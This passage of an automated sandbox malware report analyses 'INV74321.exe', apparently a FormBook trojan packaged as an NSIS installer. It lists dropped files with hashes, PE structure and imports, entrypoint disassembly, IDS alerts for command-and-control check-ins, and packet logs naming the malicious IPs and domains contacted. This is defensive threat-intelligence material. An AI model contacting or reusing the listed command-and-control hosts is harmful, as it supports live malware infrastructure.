          http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://fontfabrik.com | explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.founder.com.cn/cn | explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmp | false
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpfalse
                                                  high
                                                  http://nsis.sf.net/NSIS_ErrorINV74321.exefalse
                                                    high
                                                    http://www.jiyu-kobo.co.jp/explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.fontbureau.com/designers8explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpfalse
                                                      high
                                                      http://www.fonts.comexplorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpfalse
                                                        high
                                                        http://www.sandoll.co.krexplorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.urwpp.deDPleaseexplorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.zhongyicts.com.cnexplorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.sakkal.comexplorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown

                                                        Contacted IPs


                                                        Public

IP               Domain                    Country        ASN     ASN Name                          Malicious
154.84.101.247   www.shebagholdings.com    Seychelles     134548  DXTL-HKDXTLTseungKwanOServiceHK   true
119.18.54.126    king-jackpot.com          India          394695  PUBLIC-DOMAIN-REGISTRYUS          true
34.102.136.180   xn--espacesacr-k7a.com    United States  15169   GOOGLEUS                          false
64.190.62.111    www.booweats.com          United States  11696   NBS11696US                        true
104.21.46.55     www.downtoearthwork.com   United States  13335   CLOUDFLARENETUS                   true
87.98.148.38     www.topcasino-111.com     France         16276   OVHFR                             true
163.43.122.109   www.0o-a-8v4l76.net       Japan          9370    SAKURA-BSAKURAInternetIncJP       true

                                                        General Information

                                                        Joe Sandbox Version:32.0.0 Black Diamond
                                                        Analysis ID:411840
                                                        Start date:12.05.2021
                                                        Start time:07:34:19
                                                        Joe Sandbox Product:CloudBasic
                                                        Overall analysis duration:0h 9m 36s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:light
                                                        Sample file name:INV74321.exe
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:30
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:1
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • HDC enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Detection:MAL
                                                        Classification:mal100.troj.evad.winEXE@7/3@16/7
                                                        EGA Information:Failed
                                                        HDC Information:
                                                        • Successful, ratio: 30% (good quality ratio 27.6%)
                                                        • Quality average: 75.5%
                                                        • Quality standard deviation: 29.7%
                                                        HCA Information:
                                                        • Successful, ratio: 91%
                                                        • Number of executed functions: 0
                                                        • Number of non-executed functions: 0
                                                        Cookbook Comments:
                                                        • Adjust boot time
                                                        • Enable AMSI
                                                        • Found application associated with file extension: .exe

                                                        Simulations

                                                        Behavior and APIs

                                                        No simulations

                                                        Joe Sandbox View / Context

                                                        IPs


                                                        Domains

Match                     Associated Sample Name / URL   Detection   Context
www.downtoearthwork.com   PO09641.exe                    malicious   172.67.223.227

                                                        ASN


                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Temp\k0bmhafw06
                                                        Process:C:\Users\user\Desktop\INV74321.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):164352
                                                        Entropy (8bit):7.99866949860899
                                                        Encrypted:true
                                                        SSDEEP:3072:hRfkvdzNhJNYNhBR9+T6xzrSSgm/XDQs4JZGbRE1RnW2QnBYYrU1tukIWaXM93:hSvddNYJ+WxzNvDozGbRE1RbQnBYYwK+
                                                        MD5:47632082CDD419FABE009ECFD57523E1
                                                        SHA1:5B1B84805D90C013BE479E90532D413C47A9337F
                                                        SHA-256:22B8E49FC074DCA87B646701C013C3A6337BEF6C6D222D2CA6466289BE2B64CD
                                                        SHA-512:EF2200B4933C491642B308339546B1DC98BC23F45B909339E58D337F1A8A84B7BE7F57B7060159B47A67C4709C83D6574FF2229BE6E3486EFBD1DD81F14C9484
                                                        Malicious:false
                                                        Reputation:low
                                                        C:\Users\user\AppData\Local\Temp\k40o4d06bo6
                                                        Process:C:\Users\user\Desktop\INV74321.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):6661
                                                        Entropy (8bit):7.969996174404535
                                                        Encrypted:false
                                                        SSDEEP:96:GWc65KZOCmbbSyasSocd7r8R5lFQk+vd2ilwhRMR/t+UdO1lKtnIMzlg+o5:PUtmH/orSjheDlwXMR/tFdO1stn3gt5
                                                        MD5:5ADEB3A9190FFDF42FE06B34B0F68928
                                                        SHA1:2C01B27F4595DEA6E70E733D5C264ABF054C9B9F
                                                        SHA-256:64AFFD574DE23B95A724A54208BD070EF00B2A049FF3A281338987D09F997F5E
                                                        SHA-512:4E398D7EDB98903456267761D0EF23880AEE5EC78A3C9F852480D0B22E90D48CBAC078EA11DF78B0A90BA84ADC03483820299BF475D5E510BC9FD31414A450F6
                                                        Malicious:false
                                                        Reputation:low
                                                        C:\Users\user\AppData\Local\Temp\nsi6113.tmp\q7pl.dll
                                                        Process:C:\Users\user\Desktop\INV74321.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):4096
                                                        Entropy (8bit):4.257823721570018
                                                        Encrypted:false
                                                        SSDEEP:48:iYkYOn1ASkT3Jd95Ei4T53wz4KbCVhbmhnheBKbgXWoqsScz5dXm:ncn1ASkP34V3RKevKcXWoq7cz
                                                        MD5:792AB8BC6ED1C1B28D996EBDC1873E8C
                                                        SHA1:46D80F21EBA3150D206D9BDEF98FACD4867147AC
                                                        SHA-256:575C27017B612C76736D0B43645A8C942477B37BFD5CA34D6D82C004885283C4
                                                        SHA-512:18E7014BDF7264942A62C19A5B155ED5975AB822696CBBF3D9143EC8E2A8AE67569F9B4209CBCECDB6E0740579CBBA41294F89F2493D91D577CC7E01DEB32138
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Metadefender, Detection: 26%
                                                        • Antivirus: ReversingLabs, Detection: 55%
                                                        Reputation:low
                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................PE..L....}.`...........!......................... ...............................@....................................... ..T....!....................................... ............................................... ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                        Entropy (8bit):5.746555859558499
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:INV74321.exe
                                                        File size:579490
                                                        MD5:877bb5661fe79bb7f48cfb3ea54537a0
                                                        SHA1:dd6b5263da3b4f1a42e89c2c1ade852098561c5d
                                                        SHA256:87935ff36515ecb6a4177c25ad1d11e8d2882aa1c3f369e719406f063a062517
                                                        SHA512:a13e5bab1301b2f716945d526f1e1299b659fd2facb687fe1762348578e3d4a71993e97145481d35399f7fe369def77d5bfd4e32376b78a0116012f6370f8472
                                                        SSDEEP:6144:q9X0G6+bQSvddNYJ+WxzNvDozGbRE1RbQnBYYwKc7:c0f+bQWdNYZZDoGbREfbsuXKa
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L...".$_.................f...|......H3............@

                                                        File Icon

                                                        Icon Hash:e886a37159aadcf8

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x403348
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                        Time Stamp:0x5F24D722 [Sat Aug 1 02:44:50 2020 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:ced282d9b261d1462772017fe2f6972b

                                                        Entrypoint Preview

                                                        Instruction
                                                        sub esp, 00000184h
                                                        push ebx
                                                        push esi
                                                        push edi
                                                        xor ebx, ebx
                                                        push 00008001h
                                                        mov dword ptr [esp+18h], ebx
                                                        mov dword ptr [esp+10h], 0040A198h
                                                        mov dword ptr [esp+20h], ebx
                                                        mov byte ptr [esp+14h], 00000020h
                                                        call dword ptr [004080B8h]
                                                        call dword ptr [004080BCh]
                                                        and eax, BFFFFFFFh
                                                        cmp ax, 00000006h
                                                        mov dword ptr [0042F42Ch], eax
                                                        je 00007F6884AB8B33h
                                                        push ebx
                                                        call 00007F6884ABBC96h
                                                        cmp eax, ebx
                                                        je 00007F6884AB8B29h
                                                        push 00000C00h
                                                        call eax
                                                        mov esi, 004082A0h
                                                        push esi
                                                        call 00007F6884ABBC12h
                                                        push esi
                                                        call dword ptr [004080CCh]
                                                        lea esi, dword ptr [esi+eax+01h]
                                                        cmp byte ptr [esi], bl
                                                        jne 00007F6884AB8B0Dh
                                                        push 0000000Bh
                                                        call 00007F6884ABBC6Ah
                                                        push 00000009h
                                                        call 00007F6884ABBC63h
                                                        push 00000007h
                                                        mov dword ptr [0042F424h], eax
                                                        call 00007F6884ABBC57h
                                                        cmp eax, ebx
                                                        je 00007F6884AB8B31h
                                                        push 0000001Eh
                                                        call eax
                                                        test eax, eax
                                                        je 00007F6884AB8B29h
                                                        or byte ptr [0042F42Fh], 00000040h
                                                        push ebp
                                                        call dword ptr [00408038h]
                                                        push ebx
                                                        call dword ptr [00408288h]
                                                        mov dword ptr [0042F4F8h], eax
                                                        push ebx
                                                        lea eax, dword ptr [esp+38h]
                                                        push 00000160h
                                                        push eax
                                                        push ebx
                                                        push 00429850h
                                                        call dword ptr [0040816Ch]
                                                        push 0040A188h

                                                        Rich Headers

                                                        Programming Language:
                                                        • [EXP] VC++ 6.0 SP5 build 8804

                                                        Data Directories

                                                        Name | Virtual Address | Virtual Size | Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8544 | 0xa0 | .rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x38000 | 0x5add0 | .rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x29c | .rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                        Sections

                                                        Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                        .text | 0x1000 | 0x6457 | 0x6600 | False | 0.66823682598 | data | 6.43498570321 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                        .rdata | 0x8000 | 0x1380 | 0x1400 | False | 0.4625 | data | 5.26100389731 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data | 0xa000 | 0x25538 | 0x600 | False | 0.463541666667 | data | 4.133728555 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                        .ndata | 0x30000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .rsrc | 0x38000 | 0x5add0 | 0x5ae00 | False | 0.0560468964924 | data | 3.59489590651 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        Name | RVA | Size | Type | Language | Country
                                                        RT_ICON | 0x38280 | 0x42028 | data | English | United States
                                                        RT_ICON | 0x7a2a8 | 0x10828 | dBase III DBT, version number 0, next free block index 40 | English | United States
                                                        RT_ICON | 0x8aad0 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0 | English | United States
                                                        RT_ICON | 0x8ecf8 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0 | English | United States
                                                        RT_ICON | 0x912a0 | 0x10a8 | dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0 | English | United States
                                                        RT_ICON | 0x92348 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
                                                        RT_DIALOG | 0x927b0 | 0x100 | data | English | United States
                                                        RT_DIALOG | 0x928b0 | 0x11c | data | English | United States
                                                        RT_DIALOG | 0x929d0 | 0x60 | data | English | United States
                                                        RT_GROUP_ICON | 0x92a30 | 0x5a | data | English | United States
                                                        RT_MANIFEST | 0x92a90 | 0x340 | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

                                                        Imports

                                                        DLL | Import
                                                        ADVAPI32.dll | RegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
                                                        SHELL32.dll | SHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
                                                        ole32.dll | IIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
                                                        COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                        USER32.dll | SetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
                                                        GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                        KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersion, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

                                                        Possible Origin

                                                        Language of compilation system | Country where language is spoken
                                                        English | United States

                                                        Network Behavior

                                                        Snort IDS Alerts

                                                        Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                        05/12/21-07:36:20.954955 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.3 | 8.8.8.8
                                                        05/12/21-07:36:21.998903 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.3 | 8.8.8.8
                                                        05/12/21-07:36:25.546082 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49727 | 80 | 192.168.2.3 | 119.18.54.126
                                                        05/12/21-07:36:25.546082 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49727 | 80 | 192.168.2.3 | 119.18.54.126
                                                        05/12/21-07:36:25.546082 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49727 | 80 | 192.168.2.3 | 119.18.54.126
                                                        05/12/21-07:36:31.764293 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49733 | 80 | 192.168.2.3 | 163.43.122.109
                                                        05/12/21-07:36:31.764293 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49733 | 80 | 192.168.2.3 | 163.43.122.109
                                                        05/12/21-07:36:31.764293 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49733 | 80 | 192.168.2.3 | 163.43.122.109
                                                        05/12/21-07:36:37.560160 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49734 | 80 | 192.168.2.3 | 104.21.46.55
                                                        05/12/21-07:36:37.560160 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49734 | 80 | 192.168.2.3 | 104.21.46.55
                                                        05/12/21-07:36:37.560160 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49734 | 80 | 192.168.2.3 | 104.21.46.55
                                                        05/12/21-07:36:58.988852 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49738 | 80 | 192.168.2.3 | 64.190.62.111
                                                        05/12/21-07:36:58.988852 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49738 | 80 | 192.168.2.3 | 64.190.62.111
                                                        05/12/21-07:36:58.988852 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49738 | 80 | 192.168.2.3 | 64.190.62.111
                                                        05/12/21-07:37:04.217828 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49741 | 80 | 192.168.2.3 | 34.102.136.180
                                                        05/12/21-07:37:04.217828 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49741 | 80 | 192.168.2.3 | 34.102.136.180
                                                        05/12/21-07:37:04.217828 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49741 | 80 | 192.168.2.3 | 34.102.136.180
                                                        05/12/21-07:37:04.354921 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49741 | 34.102.136.180 | 192.168.2.3

                                                        Network Port Distribution

                                                        TCP Packets

                                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                        May 12, 2021 07:36:25.386116028 CEST | 49727 | 80 | 192.168.2.3 | 119.18.54.126
                                                        May 12, 2021 07:36:25.545658112 CEST | 80 | 49727 | 119.18.54.126 | 192.168.2.3
                                                        May 12, 2021 07:36:25.545857906 CEST | 49727 | 80 | 192.168.2.3 | 119.18.54.126
                                                        May 12, 2021 07:36:25.546082020 CEST | 49727 | 80 | 192.168.2.3 | 119.18.54.126
                                                        May 12, 2021 07:36:25.705415010 CEST | 80 | 49727 | 119.18.54.126 | 192.168.2.3
                                                        May 12, 2021 07:36:25.815865040 CEST | 80 | 49727 | 119.18.54.126 | 192.168.2.3
                                                        May 12, 2021 07:36:25.816132069 CEST | 49727 | 80 | 192.168.2.3 | 119.18.54.126
                                                        May 12, 2021 07:36:25.816175938 CEST | 80 | 49727 | 119.18.54.126 | 192.168.2.3
                                                        May 12, 2021 07:36:25.816235065 CEST | 49727 | 80 | 192.168.2.3 | 119.18.54.126
                                                        May 12, 2021 07:36:25.975882053 CEST | 80 | 49727 | 119.18.54.126 | 192.168.2.3
                                                        May 12, 2021 07:36:31.457963943 CEST | 49733 | 80 | 192.168.2.3 | 163.43.122.109
                                                        May 12, 2021 07:36:31.763951063 CEST | 80 | 49733 | 163.43.122.109 | 192.168.2.3
                                                        May 12, 2021 07:36:31.764115095 CEST | 49733 | 80 | 192.168.2.3 | 163.43.122.109
                                                        May 12, 2021 07:36:31.764292955 CEST | 49733 | 80 | 192.168.2.3 | 163.43.122.109
                                                        May 12, 2021 07:36:32.069766045 CEST | 80 | 49733 | 163.43.122.109 | 192.168.2.3
                                                        May 12, 2021 07:36:32.071120977 CEST | 80 | 49733 | 163.43.122.109 | 192.168.2.3
                                                        May 12, 2021 07:36:32.071140051 CEST | 80 | 49733 | 163.43.122.109 | 192.168.2.3
                                                        May 12, 2021 07:36:32.071275949 CEST | 49733 | 80 | 192.168.2.3 | 163.43.122.109
                                                        May 12, 2021 07:36:32.071352005 CEST | 49733 | 80 | 192.168.2.3 | 163.43.122.109
                                                        May 12, 2021 07:36:32.378624916 CEST | 80 | 49733 | 163.43.122.109 | 192.168.2.3
                                                        May 12, 2021 07:36:37.515737057 CEST | 49734 | 80 | 192.168.2.3 | 104.21.46.55
                                                        May 12, 2021 07:36:37.556760073 CEST | 80 | 49734 | 104.21.46.55 | 192.168.2.3
                                                        May 12, 2021 07:36:37.556889057 CEST | 49734 | 80 | 192.168.2.3 | 104.21.46.55
                                                        May 12, 2021 07:36:37.560159922 CEST | 49734 | 80 | 192.168.2.3 | 104.21.46.55
                                                        May 12, 2021 07:36:37.601880074 CEST | 80 | 49734 | 104.21.46.55 | 192.168.2.3
                                                        May 12, 2021 07:36:37.612606049 CEST | 80 | 49734 | 104.21.46.55 | 192.168.2.3
                                                        May 12, 2021 07:36:37.612651110 CEST | 80 | 49734 | 104.21.46.55 | 192.168.2.3
                                                        May 12, 2021 07:36:37.612804890 CEST | 49734 | 80 | 192.168.2.3 | 104.21.46.55
                                                        May 12, 2021 07:36:37.612955093 CEST | 49734 | 80 | 192.168.2.3 | 104.21.46.55
                                                        May 12, 2021 07:36:37.654967070 CEST | 80 | 49734 | 104.21.46.55 | 192.168.2.3
                                                        May 12, 2021 07:36:47.877574921 CEST | 49736 | 80 | 192.168.2.3 | 87.98.148.38
                                                        May 12, 2021 07:36:47.928168058 CEST | 80 | 49736 | 87.98.148.38 | 192.168.2.3
                                                        May 12, 2021 07:36:47.928282022 CEST | 49736 | 80 | 192.168.2.3 | 87.98.148.38
                                                        May 12, 2021 07:36:47.928524017 CEST | 49736 | 80 | 192.168.2.3 | 87.98.148.38
                                                        May 12, 2021 07:36:47.980168104 CEST | 80 | 49736 | 87.98.148.38 | 192.168.2.3
                                                        May 12, 2021 07:36:47.980216980 CEST | 80 | 49736 | 87.98.148.38 | 192.168.2.3
                                                        May 12, 2021 07:36:47.980243921 CEST | 80 | 49736 | 87.98.148.38 | 192.168.2.3
                                                        May 12, 2021 07:36:47.980434895 CEST | 49736 | 80 | 192.168.2.3 | 87.98.148.38
                                                        May 12, 2021 07:36:47.980536938 CEST | 49736 | 80 | 192.168.2.3 | 87.98.148.38
                                                        May 12, 2021 07:36:48.033574104 CEST | 80 | 49736 | 87.98.148.38 | 192.168.2.3
                                                        May 12, 2021 07:36:53.065385103 CEST | 49737 | 80 | 192.168.2.3 | 154.84.101.247
                                                        May 12, 2021 07:36:53.337536097 CEST | 80 | 49737 | 154.84.101.247 | 192.168.2.3
                                                        May 12, 2021 07:36:53.337632895 CEST | 49737 | 80 | 192.168.2.3 | 154.84.101.247
                                                        May 12, 2021 07:36:53.337873936 CEST | 49737 | 80 | 192.168.2.3 | 154.84.101.247
                                                        May 12, 2021 07:36:53.668983936 CEST | 80 | 49737 | 154.84.101.247 | 192.168.2.3
                                                        May 12, 2021 07:36:53.850891113 CEST | 49737 | 80 | 192.168.2.3 | 154.84.101.247
                                                        May 12, 2021 07:36:54.001211882 CEST | 80 | 49737 | 154.84.101.247 | 192.168.2.3
                                                        May 12, 2021 07:36:54.001437902 CEST | 49737 | 80 | 192.168.2.3 | 154.84.101.247
                                                        May 12, 2021 07:36:54.122675896 CEST | 80 | 49737 | 154.84.101.247 | 192.168.2.3
                                                        May 12, 2021 07:36:54.124511003 CEST | 49737 | 80 | 192.168.2.3 | 154.84.101.247
                                                        May 12, 2021 07:36:58.942466021 CEST | 49738 | 80 | 192.168.2.3 | 64.190.62.111
                                                        May 12, 2021 07:36:58.988545895 CEST | 80 | 49738 | 64.190.62.111 | 192.168.2.3
                                                        May 12, 2021 07:36:58.988671064 CEST | 49738 | 80 | 192.168.2.3 | 64.190.62.111
                                                        May 12, 2021 07:36:58.988852024 CEST | 49738 | 80 | 192.168.2.3 | 64.190.62.111
                                                        May 12, 2021 07:36:59.034358978 CEST | 80 | 49738 | 64.190.62.111 | 192.168.2.3
                                                        May 12, 2021 07:36:59.068284035 CEST | 80 | 49738 | 64.190.62.111 | 192.168.2.3
                                                        May 12, 2021 07:36:59.068312883 CEST | 80 | 49738 | 64.190.62.111 | 192.168.2.3
                                                        May 12, 2021 07:36:59.068438053 CEST | 49738 | 80 | 192.168.2.3 | 64.190.62.111
                                                        May 12, 2021 07:36:59.068619967 CEST | 49738 | 80 | 192.168.2.3 | 64.190.62.111
                                                        May 12, 2021 07:36:59.114044905 CEST | 80 | 49738 | 64.190.62.111 | 192.168.2.3
                                                        May 12, 2021 07:37:04.175647974 CEST | 49741 | 80 | 192.168.2.3 | 34.102.136.180
                                                        May 12, 2021 07:37:04.217358112 CEST | 80 | 49741 | 34.102.136.180 | 192.168.2.3
                                                        May 12, 2021 07:37:04.217525959 CEST | 49741 | 80 | 192.168.2.3 | 34.102.136.180
                                                        May 12, 2021 07:37:04.217828035 CEST | 49741 | 80 | 192.168.2.3 | 34.102.136.180
                                                        May 12, 2021 07:37:04.260392904 CEST | 80 | 49741 | 34.102.136.180 | 192.168.2.3
                                                        May 12, 2021 07:37:04.354921103 CEST | 80 | 49741 | 34.102.136.180 | 192.168.2.3
                                                        May 12, 2021 07:37:04.354943991 CEST | 80 | 49741 | 34.102.136.180 | 192.168.2.3
                                                        May 12, 2021 07:37:04.355241060 CEST | 49741 | 80 | 192.168.2.3 | 34.102.136.180
                                                        May 12, 2021 07:37:04.355380058 CEST | 49741 | 80 | 192.168.2.3 | 34.102.136.180
                                                        May 12, 2021 07:37:04.396428108 CEST | 80 | 49741 | 34.102.136.180 | 192.168.2.3

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
